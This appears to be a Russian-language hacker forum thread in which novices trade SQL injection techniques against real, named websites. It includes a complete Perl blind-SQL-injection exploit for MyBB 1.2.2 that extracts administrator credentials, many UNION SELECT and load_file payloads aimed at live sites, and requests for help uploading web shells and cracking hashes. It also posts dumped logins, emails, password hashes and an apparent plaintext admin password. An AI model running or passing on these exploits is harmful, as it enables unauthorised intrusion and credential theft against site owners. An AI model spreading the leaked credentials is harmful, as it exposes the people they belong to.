tabl[u]e[/u]_name+from+information_schema.tables+limit+1,1/* - обшибся немного (table_name - без "s")
Вывел [b]COLLATIONS, а Далбше что, горю от Желания, Ты уж извени я новичок[:D][/b]
Лимит меняй одын, два, три и т.д пока все названия таблиц не посмотриш...
Я поменял, просмотрел, а как вывести допустим инфу из таблицы news к примеру?
Либо вообще что дальше делать
Учи язык синтаксис языка SQL вот тебе Стотьи в помощь:
http://forum.antichat.ru/thread19610.html
[link=http://forum.xakep.ru/showProfile.aspx?memid=86367][u][color=#800080]b3d3l[/color][/u][/link] Спасибо, последний вопрос, если все узнать можно как нибудь в базу данных зайти или только таблицы и инфу из них вытаскивать можно.
Подскажи плиз
Спасибо!!!
не могу понять только как определить какие поля в таблицы [:(]
Выодит ощибку, может я что-то неправельно делаю я вот что вводил 1,ROUTINES,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns/*, где ROUTINES это таблица, а я хотел узнать поля этой таблицы.
Ошибку выводит, ввел +UNION+SELECT+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name='COLLATIONS'/*
Есть инъекция:
http://site.com/index.php?view=booking&lang_id=-1+union+select+1,load_file('/work/webs/site.com/phplib/db.php')/*
Вопрос: Можно ли, используя данную sql-inj вставить данные в таблицу?
Люди, помогите пожалуйста:
Есть эксплойт; синтаксис вроде нормальный
[code]
#!/usr/bin/perl
###########################################################
######################### LOGO ##########################
###########################################################
# Mybb <= 1.2.2 Remote SQL Injecton Exploit v.2.0 #
# #
# [u]used: SQL CLIENT_IP vulnerability #
# [!]need: Mysql >= 4.1 #
# [w]work: blind sql-inj #
# [g]google: Powered By MyBB #
# #
# coded by Elekt (antichat.ru) #
###########################################################
####################### Coments #########################
###########################################################
#
# Описание:
# Работа эксплойта основана на sql-инъекции в HTTP_CLIENT_IP.
# Неавторизованный пользователь может выполнить произвольный SQL-запрос в базу.
#
# http://host.com/mybb/index.php
# MySQL error: 1064
# You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '">'' at line 3
# Query: DELETE FROM mybb_sessions WHERE ip=''">'
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Это новая версия эксплойта.
# Мной был найден способ отказаться от использования benchmark,
# что позволяет ускорить работу эксплойта, повысить надежность полученных данных.
#
# Работа эксплойта основана на провоцировании "Subquery returns more than 1 row" ошибки,
# что позволяет произвести blind-sql-inj:
#
# mybb
# match: "Subquery returns more than 1 row"
# CLIENT_IP: 123' or 1=(select null from mybb_users where length(if(ascii(substring((select password from mybb_users where uid=1),1,1))>1,password,uid))<5)/*
# CLIENT_IP: 123' or 1=(select null from mybb_users where length(if(ascii(substring((select password from mybb_users where uid=1),1,1))>254,password,uid))<5)/*
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Полезные таблицы и поля:
# mybb_1.2.1: mybb_users - uid,username,password,salt,email,loginkey,icq,aim,regip
#
# Алгоритм генерации паролей в mybb:
# md5(md5($salt).md5($password))
# generate_salt{return random_str(8);}
#
###########################################################
######################### init ###########################
###########################################################
use LWP::UserAgent;
$sock = LWP::UserAgent->new();
$|=1;
&header();
###########################################################
####################### Options #########################
###########################################################
if (@ARGV < 2) {&info(); exit();}
$host = $ARGV[0]; # сервак
$dir = $ARGV[1]; # дира с форумом
$uid = 2; # акк админа по дефаулту
$uid = $ARGV[2] if $ARGV[2];
$debug = 0; # режим отладки
$space = "char(58)"; # разделитель столбцов
#$search = "password"; # что брутим, собственно...
#$search = "concat(uid,$space,password,$space,salt)"; # uid:password:salt
$search = "concat(uid,$space,username,$space,password,$space,salt,$space,email)"; # uid:username:password:salt:email
$search = $ARGV[3] if $ARGV[3];
# $presetascii - диапазон ascii-кодов для брута вероятных данных
# $presetascii = "0123456789abcdef";
# $presetascii = "0123456789"
# $presetascii = "abcdefghijklmnopqrstuvwxyz"
# $presetascii = "0123456789abcdefghijklmnopqrstuvwxyz"
# $presetascii = "абвгдеёжзийклмнопрстуфхцчшщъыьэюя");
# цикл, для простоты задаёт все символы для перебора
$i=0;
while($i<=255){
$presetascii.=chr($i);$i++;
}
###########################################################
######################### go! ###########################
###########################################################
$time=localtime;
&log ("[i] Start time $time\n");
&log ("[+] HOST \"$host\"\n");
&log ("[+] DIR \"$dir\"\n");
&log ("[+] UID \"$uid\"\n");
&log ("[+] Search \"$search\"\n");
###########################################################
###### detecting vulnerability and searching prefix #######
###########################################################
# detecting vulnerability and searching prefix
&log ("[~] Testing forum vulnerabile... ");
$q = "";
$prefix=query($q,$host,$dir);
if($prefix ne "not_find"){&log ("Yes! Forum vulnerable!\n");sleep(1);&log ("[~] Searching prefix...");sleep(1);&log (" prefix find - \"$prefix\"\n"); }
else
{
&log ("Sorry. Forum unvulnerable\n");
&footer();
exit();
}
###########################################################
##################### brutforce #######################
###########################################################
# brutforce
&log ("[~] Brutforce begin! it may take some time, plz, wait...\n");
$kol=1;
for ($control=0;$control==0;){
&log("\n---------------- Simvol $kol ----------------\n\n") if $debug;
$amin = 1;
$amax = length($presetascii)-1;
$n=0;
# если диапазон 4 и более символов, переопределяем диапазон, уменьшая его в 2 раза
while (($amax-$amin)>=4){
print ("-> Try ".ord(substr($presetascii,$amin,1))." .. ".ord(substr($presetascii,$amax,1))." -> ") if $debug;;
#$q = "or 1=if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."),1,benchmark(".$benchmark.",md5(char(114,115,116))))/*";
$q = "or 1=(select null from ".$prefix."users where length(if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."),password,uid))<5)/*";
if (query($q,$host,$dir) eq "not_find") {
print ("Char>=".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."\n") if $debug;;
$amin=int($amax-($amax-$amin)/2); }
else {
print ("Char<".ord(substr($presetascii,int($amax-($amax-$amin)/2),1))."\n") if $debug;;
$amax=int($amax-($amax-$amin)/2); };
}
# если диапазон менее 4-х символов, то переходим к перебору
while ($amin<=$amax) {
print ("-> Try ".ord(substr($presetascii,$amin,1))." ->") if $debug;;
# проверяем ответ скрипта, если ответ положительный то выводим символ и ищем следующий символ в слове, если не определяем символ - выход.
#$q = "or 1=if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))=".ord(substr($presetascii,$amin,1))."),1,benchmark(".$benchmark.",md5(char(114,115,116))))/*";
$q = "or 1=(select null from ".$prefix."users where length(if((ascii(substring((select ".$search." from ".$prefix."users where uid='".$uid."'),".$kol.",1))=".ord(substr($presetascii,$amin,1))."),password,uid))<5)/*";
if (query($q,$host,$dir) eq "not_find") {
&log (" FOUND!\n-> Ascii: ".ord(substr($presetascii,$amin,1))."\n-> Char: \"".substr($presetascii,$amin,1)."\"\n") if $debug;;
&log ("[$kol] Find - ascii:\"".ord(substr($presetascii,$amin,1))."\", char:\"".substr($presetascii,$amin,1)."\"\n") if !$debug;
$rezultat_char = $rezultat_char.substr($presetascii,$amin,1);
$rezultat_ascii = $rezultat_ascii.ord(substr($presetascii,$amin,1)).",";
$amin=$amax+1;$control=1;}
else { print (" NO =(\n") if $debug; $amin=$amin+1; };
}
if ($control==0) {
if($amin!=5){$rezultat_char = $rezultat_char."?";$rezultat_ascii = $rezultat_ascii."?,";
&log ("[$kol] Error! not found =( $amin\n") if !$debug;
&log (" Error! not found =(\n") if $debug;
}else{$control=1;}
}else {$control=0;}
$kol++;
}
print ("\n[!] Yyyy-a-a-a-h-h-uuu!!!\n");
&log ("\n[*] Char: $rezultat_char\n[*] Ascii: $rezultat_ascii\n");
$time=localtime;
&log ("\n[i] Finish time $time\n\n");
&footer();
exit();
###########################################################
######################## log ##########################
###########################################################
# лог
sub log($)
{
open(RES,">>".$host."_log.txt") || die "[-] Cannot open log file!"; ## Открываем лог для дозаписи
print ("$_[0]");
print RES ("$_[0]");
close(RES);
}
###########################################################
######################## footer ##########################
###########################################################
# эпилог
sub footer()
{
print ("[G] Greets: Elekt (antichat.ru), 1dt.w0lf (rst/ghc)\n");
print ("[L] Visit : www.antichat.ru\n");
}
###########################################################
######################## header ##########################
###########################################################
# хидер
sub header()
{
print q(
=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=
+ Mybb <= 1.2.2 Remote SQL Injecton Exploit v.2.0 +
+ +
+ [i]used: SQL CLIENT_IP vulnerability +
+ [!]need: Mysql >= 4.1 +
+ [w]work: blind sql-inj +
+ [i]google: Powered By MyBB +
+ +
+ coded by Elekt (antichat.ru) +
=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_+
);
}
###########################################################
######################## info ##########################
###########################################################
# инфо
sub info()
{
print q(
[i] Usage:
perl mybb122exp.pl [host] [/dir/] [uid] [search]
*-required
*[host] - target host without http://
*[/dir/] - installed forums dir
[uid] - user uid (default=2)
[search] - data (uid:username:password:salt:email)
[E] Example: perl mybb122exp.pl host.com /forum/ 1 password
[i] mybb: md5(md5($salt).md5($password))
);
}
###########################################################
####################### sender #########################
###########################################################
# процедура приема\посылки данных
sub query()
{
#&log ("\n\n$q\n\n") if $debug;
my($q,$host,$dir) = @_;
$res = $sock->get("http://".$host.$dir."index.php",'USER_AGENT'=>'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)','CLIENT_IP'=>"' ".$q);
if($res->is_success)
{
if($res->as_string =~ /FROM (.*)sessions/) { return $1; } else {return "not_find";}
}
else{&log ("\n[!] Connection to $host FAILED! EXIT\n"); exit;}
}
# milw0rm.com [2007-04-12]
[/code] но при попытке его использовать, выдается следующее:
[code]=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=
+ Mybb <= 1.2.2 Remote SQL Injecton Exploit v.2.0 +
+ +
+ [i]used: SQL CLIENT_IP vulnerability +
+ [!]need: Mysql >= 4.1 +
+ [w]work: blind sql-inj +
+ [i]google: Powered By MyBB +
+ +
+ coded by Elekt (antichat.ru) +
=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_=_+
[i] Start time Sat Jan 12 23:18:07 2008
[+] HOST "winegrowers.mybb.ru"
[+] DIR "/forum/"
[+] UID "3"
[+] Search "password"
[~] Testing forum vulnerabile... Can't locate object method "get" via package "L
WP::UserAgent" at c:\vzlom.pl line 249.
[/code] подскажите, че делать ????
Люди у меня токая проблемка я по совету dos 999 я решил учится на инет-магазинах )))
собственно сама проблема
/?code=5166+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
я не знаю че делать дальше я читал FAQ-и и там было что типа мне долно отобразится что-то но не че нет я пробовал изменять на
?code=5166+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+limit+1,1/* и limit 2,2
вопросы
1)и он мне выдал Table 'morozini.2_brand' doesn't exist что это???
2)что делать дальше???
Плохо читал FAQ-и.
пробуй ?id=-1+union+select+… а не ?id=-1'+union+select+…
Просто в параметре фильтруетсо кавычко
Нет всеровно ошибку выводит :(
А если есть sql инъекция, то в базе данных можно удалить таблицу к примеру или саму базу, если mysql, и что такое шелл?
Я все узнал, за исключением как вывести инфу к примеру из таблицы users где id=1, и можно ли удалить или записать в базу mysql 5 через sql инъекцию, заранее спасибо:)
Хых) ща вставлю свой вопросик)
Получается если версия мускула меньше пятой, то имена таблиц нужно полюбому подбирать самому? без вариантов?
Здравствуйте.
Есть форум на движке discuz! 5.0.0. Прочитал несколько статей на вашем сайте. В частности про SQL-инъекцию и XSS нападение на данный форум. В одной из статей был эксплоит. Пробовал взломать целевой форум через SQL-инъекцию, но он не реагирует на ' ни в какую. Не выдает никаких ошибок. Куда загружать эксплоит я вообще не разобрался.
Я не прошу взломать этот форум вместо меня. Я всего лишь прошу указать верное направление. Посоветуйте, пожалуйста. Премного благодарен.
П.С. Форум - [link=http://naemniki.bosslife.ru/forum/]http://naemniki.bosslife.ru/forum/[/link]
люди помогите у меня есть
code=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
как мне узнать имя таблици и столбцов не перебором ???
и еще что это за проблема и как с ней боротся
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table' at line 1
[b]Помогите мне в, возможно, простой ситуации.[/b]
[u]Есть(нашел) сайт на котором есть sql-inj.[/u]
Ситуация следующая:
[hr]
1. Подобрал количество полей. Значения выводятся - это все получается!
2. Получил user()-[i]%user%@localhost[/i], version() - [i]4.1.20-log[/i], database()
3. Подобрал таблицу, из нее вытащил 4 логина и passwd к ним! Что с ними делать?
4. Что значит localhost в [i]%user%@localhost[/i]. К базе можно подобраться только с локалхоста? Если это так, то как это можно побороть?
5. Пробовал подцепить файл с пом. [i]load_file()[/i], но толи путь неверный пишу, тли функция не работает!? Как узнать что функция мне доступна?
6. Использовал [b]INTO OUTFILE[/b] - использовал ее для того что бы простой шелл залить. За писал допустим в 1.php, но вызывая этот файл - ошибка. Возможно не тот путь указал! Как узнать куда INTO записывает файл, как узнать эти пути?
Дак всетаки что можно делать если есть то что написано в 164 посте? И как этим воспользоваться?
[b]Помогите разобраться в SQL-inj[/b]
Вот нашел подопытного-
[code]http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(name,char(47),password,char(47),email),11,12+from+user+limit+0,1/*[/code]
Получил name, pwd, email - что с этим можно сделать дальше? Что можно сделать с этим сайтом? Покажите, если вас не затруднит, конечное!?
Можно ли тут прочитать файлы с сервера?
[i]Заранее спасибо![/i]
я конечно нуб в этом деле но судя по прочитаному надо найти админку и попробовать залогинится(возможно говорю чтотоне то:)
привет всем тут! )
http://www.lit.dp.ua/?rid=-1+union+select+1,2,3,4,5,6
вот что имеется.
но меня никак не радует вот ЭТО:
http://www.lit.dp.ua/?rid=-1+union+select+1,2,3,4,5,6&cont=news
я не выкуплю, что где отрабатывает...
то есть что запрашивает эрайди, а что конт...
кста...
на
http://www.lit.dp.ua/?rid=-1+union+select+1,2,3,4,5,6&cont='
выводит тоже ересь...
кто нить че нить подскажите...
заранее благодарю!
http://www.lit.dp.ua/?rid=-1+union+select+1,2,3,4,5,6&cont='
Ну и вот, локальный инклуд вроде выцепил, а это /usr/home/Hosting/src/lit.dp.ua/ - путь до сервака
я это и сам прекрасно понимаю... про сервак...
подскажете может, че с ним делать?
что значит ЛОКАЛЬНЫЙ инклуд?
куда именно rid / cont подставлять запрос... вообще какой план действий?
если не трудно подскажите...
маны читал (и как инклудить и майскьюел ру) но я чет не выкупаю самой логики))
Пашкела, спс за ответ! ;)
--------------------------------
ааааааааа...
кажется выкупил...
про локальный... это типа к БД уже не относится? возможность подгрузить файл какй-нить? так понял?
а скьюэл тут есть все-таки?
Дополнения к моему последнему посту....
Нашел какую-то админку....
http://domkino.spb.ru/adm/
но почему то ничего из того что я выудил из таблицы 'user' не подходит.....
Вот база user:
Шурик/ahin/sshurik@online.ru
Андрей/andrey/nag@parnas.spb.ru
Sergh/ss/sergh@finec.ru
Джек-потрошитель/jack/jack@mail.ru
Изначально уязвимость кроется тут:
[link=http://www.aromat.ru/parfum/men_tend.php3?new=1&cat=-2273']http://www.aromat.ru/parfum/men_tend.php3?new=1&cat=-2273'[/link]
Отрывайтесь. Сайт стоит на 2 строчке яндекса по запросу "косметика"
я попробовал...
таблицы - выводит.
столбцы - так чет оно и не запахало...
то есть (там есть Users таблица) вводил where+table_anme='Users' - безпонта*
У меня тоже самое. Знает кто как это можно обойти? На mysql.user тож не реагирует...
Полдня сижу... Нутром чувствую, что где то здесь есть косяк, но найти пока не могу. Кста, запрос довольно популярный, может на этом, если правильно раскрутить можно будет даже деньжат сорвать.
а вот по моему замуту (www.lit.dp.ua) как быть если нет информатион схема? брутить название таблиц типа?
если версия не 5, то да, только брут...
а еще вопрос, при назывании таблиц регистр важен?
я просто подумываю брутер написать...
где-то видел даже... но чет хочется покодить)
select table_name from information_schema.tables
У кого есть пример исходников брутфорсера для подбора таблиц?
Кста, удобнее всего было бы если на пхп.
Потому что даже на ДСЛ брутить бессмыслено. Да и дороговато. Пускай брутит сервер нашего ближнего :-) с его гигабитным каналом и производительностью, а нам тогда останется тока результат забрать.
А сервер найти - не проблема. Будем использовать сервер тех кого уже поимели, для получения доступа к тем кого еще не поимели.
Эта мысль вообще в практическом плане реализуемая?
Сегодня нашел инъекции еще на нескольких сайтах - названия таблиц выводятся нормально, а вот колонки из таблиц не тянутся ни в какую.
Даю запрос: [link=http://****.**/index.php?article=-1+union+select+1,2,column_name,3,5,6+from+information_schema.columns+where+table_name='ibf_member_extra'+limit+1,1/]http://****.**/index.php?article=-1+union+select+1,2,column_name,3,5,6+from+information_schema.columns+where+table_name='ibf_member_extra'+limit+1,1/[/link]*
А в ответ снова ловлю ошибку. Кто поопытнее, подскажите пожалуйста есть ли возможность это обойти?
Может нужно как-то запрос по другому построить?
лол
http://fa-kit.ru/main_lst.php?top_id=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,0,1,2,3,4,5,6/*
4.1.20-log/db_shurem_2/dbu_shurem_1@192.168.5.75
Спасибо ото бы я не додумался=)))
_________
))
ты сам флудишь, кста!
ты бы себе тоже карту выставил?
есть сайт на котором надо перебрать все таблицы просто изменяя значение в в limit x,1
можноли как то это автоматизировать - может быть есть скрипт или программа какая...
news.phpl?nid=-1+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+FROM+INFORMATION_SCHEMA.TABLES+limit+70,1/*
т.к. таблиц оч много - лень все это руками делать!
и можно ли как-то просмотреть поля в этих таблицах?
Есть инъекция на одном сайте.
Количество столбцов(52) вычислил запросом [link=http://kakoytosayt.ru/script.php?id=-1+order+by+52/]http://kakoytosayt.ru/script.php?id=-1+order+by+52/[/link]*
Причем если подбирать таким запросом: id=-1+union+select+null,null,null..(52раза)/* то почему-то все равно выводится ошибка.
Вопрос следующий: как определить в какой части страницы какая колонка выводится, когда их 52 0_о? Вручную вместо каждого null вбивать нечто, вроде 123 и так 52раза!? Может есть какой-нибудь запрос попроще?
Не проходит, вылетает ошибка и так, и с ...51,52/* как-будто число столбцов неверное было order by подобрано, хотя на group by перепроверил - все ок
[link=http://modelstar.ru/viewmodel.php?id=']http://modelstar.ru/viewmodel.php?id='[/link]
с помощью инъекции добыл такие имена таблиц в базе: blog,VIEWS,USER_PRIVILEGES,TRIGGERS,TABLE_PRIVILEGES,TABLE_CONSTRAINTS,TABLES,STATISTICS,SCHEMATA,ROUTINES,KEY_COLUMN_USAGE,COLUMN_PRIVILEGES,COLUMNS.
имена столбцов с помощью шэмы найти не удалось. Я заметил что имена этих таблиц часто встречаюися на различных сайтах. Но что из этих таблиц можно извлечь? Возможно имена столбцов уже известны?
Куда копать? Объясните на примерах.
п.с. ещё часто встречается таблица cms_user. Может ли она помочь при взломе? Так же хотелось бы узнать имена столбцов.
это системные таблицы, в них хнаняться имена индексов, пользователей и т.д. ... установи мускул и юзай, всё поймёшь
Скачал SIPT но манулала не нашол)))
_________
помогите найти...желательно со скринами)) думаю вы понимаете почему именно сюда задал вопрос ))
Проблема с LOAD_FILE();
Каким должен быть путь к файлу?
в том же lit.dp.ua, в котором кто-то нашел ошибку. как просмотреть например файл functions.php.
получаю адрес за счет ошибки:
http://www.lit.dp.ua/?rid=-1+union+select+1,2,'test',4,5,6/*
[b]"Warning[/b]: mysql_num_rows(): supplied argument is not a valid MySQL result resource in [b]/usr/home/Hosting/src/lit.dp.ua/functions.php[/b] on line [b]82"
теперь делаю LOAD('[/b][b]/usr/home/Hosting/src/lit.dp.ua/functions.php'):
http://www.lit.dp.ua/?rid=-1+union+select+1,2,LOAD_FILE(char(47,117,115,114,47,104,111,109,101,47,72,111,115,116,105,110,103,47,115,114,99,47,108,105,116,46,100,112,46,117,97,47,102,117,110,99,116,105,111,110,115,46,112,104,112)),4,5,6/*
возвращает null. что я делаю не так?
[/b][b]
[/b]
спасибо. а сам запрос верен?
На локалхосте пытаюсь по фулл физ. адресу с консоли мускла LOAD_FILE('path') - выходит. Переделываю path в ord(без кавычек) - выдает также пустой результат.
Версия mysql такая же как и на подопытном -- 4.1
Народ не давно я обнаружил SQL-инъекцию ( [link=http://hhunt.ru:81/comments.php?news_id=1%27&PHPSESSID=b74b26922c3ce83edfa2477538dc3d89]http://hhunt.ru:81/comments.php?news_id=1'&PHPSESSID=b74b26922c3ce83edfa2477538dc3d89[/link] )
и ( [link=http://hhunt.ru:81/clan.php?clan=Clan+Of+The+Black+Hand&city_id=1%27]http://hhunt.ru:81/clan.php?clan=Clan+Of+The+Black+Hand&city_id=1'[/link] ) можно ли их использовать и что получиться ??? попоряку плз все объясните как и что делать. Читал несколько статей все делал так как и там но чето не получаеться[image]http://forum.xakep.ru/image/s13.gif[/image]
вопрос не по скуль, но вс же
_http://s_o_t_a.o_r_g.r_u/news/newdata.php?page=1%3Cp%20style=%22font-size:50px%22%3Efuking%20space%20invaderz%3C/p%3E3E
возможно как нить заюзать данное неадекватное поведение?
если -да- то в какую сторону думать?
помогите раскрутить
http://s3.ikariam.org/index.php?view=city&id='
http://s3.ikariam.org/index.php?view=wonder&id='
http://s3.ikariam.org/index.php?view=sendMessage&type=0&with=14082&destinationCityId='&oldView=island
или
http://s3.ikariam.org/index.php?view=sendMessage&type=0&with='&destinationCityId=14082&oldView=island
в инъекции не хочет работать ";". You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';-- AND type=1 order by time ASC' at line 1
любое появление ";" карается ошибкой. union select, расширение where замечательно работают. вот еслиб еще одну каманду дописать...
Как получить имена таблиц если скул ниже 5 ?
брутом....
да. )
Всем привет! Имеется сайт с инъектом http://www.hpol.org/record.php?id=72'
Траблы возникают при подборе количества полей. Если подбирать с помощью ордер бай, то начиная с 8 выводится сообщение
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY title ASC' at line 1
Если брать значение больше, то
Unknown column '10' in 'order clause'
Перебор тоже резульиатов не дал.
В чем проблема? Как ее решить?
Заранее при много благодарен:))))))
Помогите расхешировать:
2325f09e4fe960e1
Здрасте
нород скажите плиз что можно использовать вместо union в MSSQL??????а для обшего развития и по возможносте в остальных :)
про MSSQL почитай вот статейка не плохая......
_http://forum.antichat.ru/threadnav30501-1-10.html
при sql инекциях MySQL и MSSQL не силь отличаються... при "union" в MSSQL могут возникнуть проблемы с совместимостью типов... советую использовать "union all" ещё в MSSQL не катит в конце строки "/*" , если хотите закоментить ставьте "--" т.к. субд будет ругаться на незакрытый коментарий. и ещё в MSSQl не существует оператьра limit и подобных операторов вообще там нет, хотя есть top но его при инекциях использовать неполучиться... удачи)))
Пацаны помогите разобраться ни хера не получается!
intimcity.ru/Wap/person.php?id=-1+union+select+1/*&msgs=true#card1
Название таблиц не могу получить[8|]
Может не правильно запрос, состовлял.
Одно сильно нервирует
select+1( что только 1)
Помогите ламеру!
Помогите определить тип алгоритма и брутнуть хеш:
2325f09e4fe960e1
С пом. sql inj поимел 3 связки login:passwd
Нашел админку site.xu/admin
Под 2мя сог зайти - могу менять новости на главной странице...
можно заливать к новости файл...
Я попробовал залить php шелл... но когда к нему обращаюсь/открываю уже в новости с гл. страницы.. то он не загружается... просто пустая страница...
И получается что с сайтом то я почти ничего не могу сделать...
От куда еще могут управлять все структурой сата?? что еще можно попробовать...
кста.. пробовал к ftp подконекаться - не получилось!
Blacksun. Спасибо попробую![;)]
Почему не выводятся номера столбцов?
http://www.crestron-home.ru/catalog/type.php?id=809+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
А может потому, что нет принтабельных столбцов?!
[code]http://www.crestron-home.ru/catalog/type.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*[/code]а тут этих, самых принтабельных столбцов до*уя...[;)]
Люди у меня такая проблема:делая имею с mssql я нашел столбец fio(я так думаю это данные людей:) и когда я их вывожу отображаются каракули как сделать чтобы показывался нормальный текст??
нород помогите когда я делаю запрос
id=1+or+1=(SELECT+TOP+1+email+from+candidates)--
у меня выводится
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '????????' to a column of data type int.
/cofe_cat_in.asp, line 59
что за ???????? ??и как с этим боротся
Думаю у тебя кодировка некорректная стоит, что-то типа автовыбор
На этом IP зарегестрировано 398 сайтов 80.93.57.197 [;)]
люди а как узнать какие сайты зарегины на одном IP?
Сам прошарил, пост просьба удалить)
Скажите, с инъектов в лимите можно что нить сделать?
Помогите с сайтом
http://www.crestron-home.ru/catalog/type.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Использую CHAR() работает, но не совсем как хотелось бы. Он выводит не версию, а только само слово version().
118,101,114,115,105,111,110,40,41 - это version() в CHAR-е.
Может прав не хватает? Или самописная БД?
[
подскажите плиз как передвигатся по строком в MSSQL (что-то типа limit в mysql)
вто запрос
cofe_cat_in.asp?id=1+or+1=(SELECT+TOP+1+password +from+users)--
Есть поле ввода для имя и пароля. При вводе 1' в оба поля, появляется ошибка
[b]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '09b701c3f9333d39307f32ff74014213' and del=0 and gid<3 limit 1' at line 1
select * from users where login='1'' AND passwd='09b701c3f9333d39307f32ff74014213' and del=0 and gid<3 limit 1[/b]
Как мне её раскрутить дальше?
Прошу помощи у Guru SQL-inject'a!!!
Есть сайт с двиглом вроде: PostNuke 0.7.2.3-Phoenix
Я лазал по Секьюритилаб и Секьюритифокус, нашёл много чего полезного там, но не одна полезность с Sql не сработала! :(
Помогите плиз понять это SQL-inject или нет(я уже 2 день бьюсь) или подскажите что-нибудь
1)http://msau.ru/modules.php?op=modload&name=Messages&file=readpmsg&start=-1
2)http://msau.ru/modules.php?op=modload&name=Members_List&file=index&letter=admin&sortby='
P.S. Да кстати пробовал подобрать поля, дошел до 32 и больше не смог.
P.S.S. Сильно за вопрос не ругайте, я только учусь
Есть очень сложная SQL-уязвимость. Вообщем выглядит так [code]SELECT users, passwords FROM blablabla LIMIT {inj}, 15[/code]Так, вот. я могу подставить любое значение в {inj}. Как можно раскрутить эту скулю??? Я думал про подзапросы, хотя я не такой знаток в SQL, но все же. Что тут можно сделать?
гениальный вопрос!!! Это MySQL... какой версии не известно... потому, что я не могу подставить union+select!
Здравствуйте!
Прочел данный топ и у меня получилосбь вытащить следующую инфу
USER() root@localhost
VERSION() 4.1.7-standard-log
DATABASE() site
http://www.site/news/newsditail.php?recordID=-1+union+select+1,2,concat_ws(0x3a,password),4,5+from+users+limit+0,1/*
таблица users
login admin
pass 046f49096f613bc782dfb62caccf24cc
чел: sketler
пасс: 74f14964700c9f6506c513f5f938a428
http://www.site/news/newsditail.php?recordID=-1+union+select+1,2,concat_ws(0x3a,login),4,5+from+admin+limit+0,1/*
таблица admin
login: root
пароль: Piz01EN
Хеши рассшифровать не удалось и у меня вопрос как можно подключиться к базе удаленно ведь логин и пасс у меня есть?
А ему пох хоть там локалхост стоят будет))))
Я имею ввиду проги какиемибуть есть?
стандартными средствами подключиться вряд ли получиться т.к. порт скоре всего закрыт
помщи в гугле, может и есть
2dos 999 и осталльные кто учавствует в этом диалоге
ДетСад честное слово - луче ваше такого больлше не пишите... читать противно
Я не об этом: http://www.site/news/newsditail.php?recordID=-1+union+select+1,2,concat_ws(0x3a,login),4,5+from+admin+limit+0,1/*
а об
http://www.site/news/newsditail.php?recordID=1 - у меня не загружается
Сразу попрошу прощения за глупый вопрос.
Нашол в сети портал (висит на Денвере) с огромным кол-вом вот таких ошибок:
[image]http://i033.radikal.ru/0803/b3/950d90a4e1d5.jpg[/image]
-------------------------------------------------------------------------------------------
[image]http://i011.radikal.ru/0803/b3/dc129a6cceb0.jpg[/image]
-------------------------------------------------------------------------------------------
Можно ли в данной случае заюзать sql инъекцию? Или что это все вообще может означать? Жду ваших советов.
Заранее спасибо.
p.s. на каталог templates попал случайно, скрины что выше от туда.
мастерам SQL-inj помогите реализовать (все уже готово тока меня смущает несколько пункиков...)
[link=http://puredawn.org/index.php?id=39]http://puredawn.org/index.php?id=39[/link]
Что это? о_О
И что тебя смущает?
есть сайт www.freerealty.ru там скрипт отправка почты......
я подставил кавычку www.freerealty.ru/mail.php?cat=108&de=113213'
и получил Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
следовательно есть SQL
начал подбор полей http://www.freerealty.ru/mail.php?cat=108&de=1+unioin+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* но так ничего и не добился подбор я так понял предстоял долгий.............
Что нужно делать дальше????
да и еще когда я вводил http://www.freerealty.ru/mail.php?cat=108&de=1+order+by+11/*
то писало Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
